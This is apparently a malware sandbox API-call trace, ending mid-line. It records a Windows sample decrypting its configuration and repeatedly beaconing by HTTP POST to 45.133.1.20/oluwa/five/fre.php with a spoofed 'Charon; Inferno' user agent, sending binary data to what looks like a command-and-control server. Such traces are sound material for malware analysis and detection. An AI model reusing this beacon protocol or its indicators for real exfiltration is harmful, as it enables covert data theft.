[0181.226] GetProcessHeap () returned 0x6a0000 [0181.226] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6c4710 [0181.228] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0181.230] wvsprintfA (in: param_1=0x6c4710, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0181.230] GetProcessHeap () returned 0x6a0000 [0181.230] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6bbc60 [0181.230] GetProcessHeap () returned 0x6a0000 [0181.231] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 [0181.232] GetProcessHeap () returned 0x6a0000 [0181.232] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4a30 [0181.232] GetProcessHeap () returned 0x6a0000 [0181.232] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6c4710 [0181.237] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0181.253] wvsprintfA (in: param_1=0x6c4710, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0181.254] GetProcessHeap () returned 0x6a0000 [0181.254] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bbd20 [0181.254] GetProcessHeap () returned 0x6a0000 [0181.255] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 [0181.255] send (s=0x3ec, buf=0x6bbd20*, len=242, flags=0) returned 242 [0181.259] send (s=0x3ec, buf=0x6bb998*, len=159, flags=0) returned 159 [0181.260] GetProcessHeap () returned 0x6a0000 [0181.260] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c4710 [0181.260] recv (in: s=0x3ec, buf=0x6c4710, len=4048, flags=0 | out: buf=0x6c4710*) returned 204 [0181.335] GetProcessHeap () returned 0x6a0000 [0181.335] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bbd20 | out: hHeap=0x6a0000) returned 1 [0181.335] GetProcessHeap () returned 0x6a0000 [0181.335] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4a30 | out: hHeap=0x6a0000) returned 1 [0181.336] GetProcessHeap () returned 0x6a0000 [0181.336] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bbc60 | out: hHeap=0x6a0000) returned 1 [0181.336] GetProcessHeap () returned 0x6a0000 [0181.336] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bf168 | out: hHeap=0x6a0000) returned 1 [0181.336] closesocket (s=0x3ec) returned 0 [0181.337] GetProcessHeap () returned 0x6a0000 [0181.337] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6baa20 | out: hHeap=0x6a0000) returned 1 [0181.337] GetProcessHeap () returned 0x6a0000 [0181.337] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b6de0 | out: hHeap=0x6a0000) returned 1 [0181.337] GetProcessHeap () returned 0x6a0000 [0181.338] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b49a0 | out: hHeap=0x6a0000) returned 1 [0181.338] GetProcessHeap () returned 0x6a0000 [0181.338] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3670 | out: hHeap=0x6a0000) returned 1 [0181.338] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c4710, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1068) returned 0x3ec [0181.341] Sleep (dwMilliseconds=0xea60) [0181.343] GetProcessHeap () returned 0x6a0000 [0181.343] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4d48 [0181.343] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0181.344] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0181.351] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0181.352] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bef48) returned 1 [0181.450] GetProcessHeap () returned 0x6a0000 [0181.450] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0181.451] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0181.452] CryptImportKey (in: hProv=0x6bef48, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad020) returned 1 [0181.453] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0181.453] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0181.454] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0181.456] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0181.456] GetProcessHeap () returned 0x6a0000 [0181.456] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0181.457] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0181.457] CryptDecrypt (in: hKey=0x6ad020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4d48, pdwDataLen=0x19fcfc | out: pbData=0x6b4d48, pdwDataLen=0x19fcfc) returned 1 [0181.459] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0181.459] CryptDestroyKey (hKey=0x6ad020) returned 1 [0181.460] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0181.461] CryptReleaseContext (hProv=0x6bef48, dwFlags=0x0) returned 1 [0181.461] GetProcessHeap () returned 0x6a0000 [0181.461] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6b6de0 [0181.461] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0181.462] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0181.463] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0181.463] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0181.464] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0181.465] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0181.465] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0181.466] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0181.466] GetProcessHeap () returned 0x6a0000 [0181.466] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3670 [0181.466] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0181.467] GetProcessHeap () returned 0x6a0000 [0181.467] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3670 | out: hHeap=0x6a0000) returned 1 [0181.467] GetProcessHeap () returned 0x6a0000 [0181.468] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b6de0 | out: hHeap=0x6a0000) returned 1 [0181.468] GetProcessHeap () returned 0x6a0000 [0181.469] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4d48 | out: hHeap=0x6a0000) returned 1 [0181.469] GetProcessHeap () returned 0x6a0000 [0181.469] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4d48 [0181.470] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0181.470] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0181.477] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0181.479] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bef48) returned 1 [0181.550] GetProcessHeap () returned 0x6a0000 [0181.550] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0af0 [0181.569] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0181.570] CryptImportKey (in: hProv=0x6bef48, pbData=0x6b0af0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad020) returned 1 [0181.571] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0181.571] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0181.572] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0181.573] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0181.573] GetProcessHeap () returned 0x6a0000 [0181.574] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0af0 | out: hHeap=0x6a0000) returned 1 [0181.574] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0181.575] CryptDecrypt (in: hKey=0x6ad020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4d48, pdwDataLen=0x19fcfc | out: pbData=0x6b4d48, pdwDataLen=0x19fcfc) returned 1 [0181.576] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0181.576] CryptDestroyKey (hKey=0x6ad020) returned 1 [0181.579] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0181.579] CryptReleaseContext (hProv=0x6bef48, dwFlags=0x0) returned 1 [0181.579] GetProcessHeap () returned 0x6a0000 [0181.579] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6b6de0 [0181.580] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0181.580] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0181.581] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0181.582] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0181.583] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0181.583] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0181.585] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0181.585] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0181.585] GetProcessHeap () returned 0x6a0000 [0181.585] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0181.585] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6bf828*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6bea48*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0181.586] GetProcessHeap () returned 0x6a0000 [0181.586] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6ba9b0 [0181.586] socket (af=2, type=1, protocol=6) returned 0x3f0 [0181.586] connect (s=0x3f0, name=0x6bea48*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0181.615] FreeAddrInfoW (pAddrInfo=0x6bf828*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6bea48*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0181.615] GetProcessHeap () returned 0x6a0000 [0181.615] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bef48 [0181.615] GetProcessHeap () returned 0x6a0000 [0181.615] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6c4710 [0181.617] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0181.618] wvsprintfA (in: param_1=0x6c4710, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0181.618] GetProcessHeap () returned 0x6a0000 [0181.618] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6bbc60 [0181.618] GetProcessHeap () returned 0x6a0000 [0181.619] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 [0181.619] GetProcessHeap () returned 0x6a0000 [0181.619] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b49a0 [0181.619] GetProcessHeap () returned 0x6a0000 [0181.619] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6c4710 [0181.620] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0181.621] wvsprintfA (in: param_1=0x6c4710, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0181.621] GetProcessHeap () returned 0x6a0000 [0181.621] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bbd20 [0181.621] GetProcessHeap () returned 0x6a0000 [0181.621] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 [0181.623] send (s=0x3f0, buf=0x6bbd20*, len=242, flags=0) returned 242 [0181.623] send (s=0x3f0, buf=0x6bb998*, len=159, flags=0) returned 159 [0181.623] GetProcessHeap () returned 0x6a0000 [0181.623] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c4710 [0181.623] recv (in: s=0x3f0, buf=0x6c4710, len=4048, flags=0 | out: buf=0x6c4710*) returned 204 [0181.717] GetProcessHeap () returned 0x6a0000 [0181.717] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bbd20 | out: hHeap=0x6a0000) returned 1 [0181.718] GetProcessHeap () returned 0x6a0000 [0181.718] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b49a0 | out: hHeap=0x6a0000) returned 1 [0181.719] GetProcessHeap () returned 0x6a0000 [0181.719] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bbc60 | out: hHeap=0x6a0000) returned 1 [0181.720] GetProcessHeap () returned 0x6a0000 [0181.720] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bef48 | out: hHeap=0x6a0000) returned 1 [0181.720] closesocket (s=0x3f0) returned 0 [0181.721] GetProcessHeap () returned 0x6a0000 [0181.721] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ba9b0 | out: hHeap=0x6a0000) returned 1 [0181.721] GetProcessHeap () returned 0x6a0000 [0181.721] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b6de0 | out: hHeap=0x6a0000) returned 1 [0181.721] GetProcessHeap () returned 0x6a0000 [0181.721] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4d48 | out: hHeap=0x6a0000) returned 1 [0181.721] GetProcessHeap () returned 0x6a0000 [0181.722] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0181.722] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c4710, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x107c) returned 0x3f0 [0181.724] Sleep (dwMilliseconds=0xea60) [0181.726] GetProcessHeap () returned 0x6a0000 [0181.726] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4d48 [0181.726] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0181.727] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0181.734] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0181.735] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6beb90) returned 1 [0181.745] GetProcessHeap () returned 0x6a0000 [0181.745] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0181.746] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0181.746] CryptImportKey (in: hProv=0x6beb90, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad020) returned 1 [0181.747] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0181.748] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0181.749] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0181.749] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0181.749] GetProcessHeap () returned 0x6a0000 [0181.750] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0181.751] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0181.751] CryptDecrypt (in: hKey=0x6ad020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4d48, pdwDataLen=0x19fcfc | out: pbData=0x6b4d48, pdwDataLen=0x19fcfc) returned 1 [0181.752] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0181.752] CryptDestroyKey (hKey=0x6ad020) returned 1 [0181.758] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0181.759] CryptReleaseContext (hProv=0x6beb90, dwFlags=0x0) returned 1 [0181.759] GetProcessHeap () returned 0x6a0000 [0181.759] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6b6de0 [0181.760] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0181.761] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0181.761] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0181.762] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0181.763] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0181.763] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0181.764] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0181.764] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0181.764] GetProcessHeap () returned 0x6a0000 [0181.764] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3670 [0181.765] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0181.765] GetProcessHeap () returned 0x6a0000 [0181.765] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3670 | out: hHeap=0x6a0000) returned 1 [0181.765] GetProcessHeap () returned 0x6a0000 [0181.766] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b6de0 | out: hHeap=0x6a0000) returned 1 [0181.766] GetProcessHeap () returned 0x6a0000 [0181.766] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4d48 | out: hHeap=0x6a0000) returned 1 [0181.766] GetProcessHeap () returned 0x6a0000 [0181.767] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4d48 [0181.768] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0181.768] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0181.775] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0181.776] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bed28) returned 1 [0181.784] GetProcessHeap () returned 0x6a0000 [0181.784] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0181.785] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0181.785] CryptImportKey (in: hProv=0x6bed28, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad020) returned 1 [0181.786] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0181.786] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0181.788] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0181.788] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0181.788] GetProcessHeap () returned 0x6a0000 [0181.789] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0181.790] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0181.790] CryptDecrypt (in: hKey=0x6ad020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4d48, pdwDataLen=0x19fcfc | out: pbData=0x6b4d48, pdwDataLen=0x19fcfc) returned 1 [0181.791] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0181.791] CryptDestroyKey (hKey=0x6ad020) returned 1 [0181.792] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0181.793] CryptReleaseContext (hProv=0x6bed28, dwFlags=0x0) returned 1 [0181.793] GetProcessHeap () returned 0x6a0000 [0181.793] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6b6de0 [0181.794] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0181.794] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0181.795] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0181.795] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0181.796] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0181.797] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0181.798] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0181.798] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0181.798] GetProcessHeap () returned 0x6a0000 [0181.798] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3670 [0181.798] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6bf468*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6be9b8*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0181.798] GetProcessHeap () returned 0x6a0000 [0181.799] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6baa40 [0181.799] socket (af=2, type=1, protocol=6) returned 0x3f4 [0181.799] connect (s=0x3f4, name=0x6be9b8*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0181.830] FreeAddrInfoW (pAddrInfo=0x6bf468*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6be9b8*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0181.830] GetProcessHeap () returned 0x6a0000 [0181.830] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bef48 [0181.831] GetProcessHeap () returned 0x6a0000 [0181.831] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6c4710 [0181.831] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0181.833] wvsprintfA (in: param_1=0x6c4710, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0181.833] GetProcessHeap () returned 0x6a0000 [0181.833] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6bbc60 [0181.833] GetProcessHeap () returned 0x6a0000 [0181.833] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, 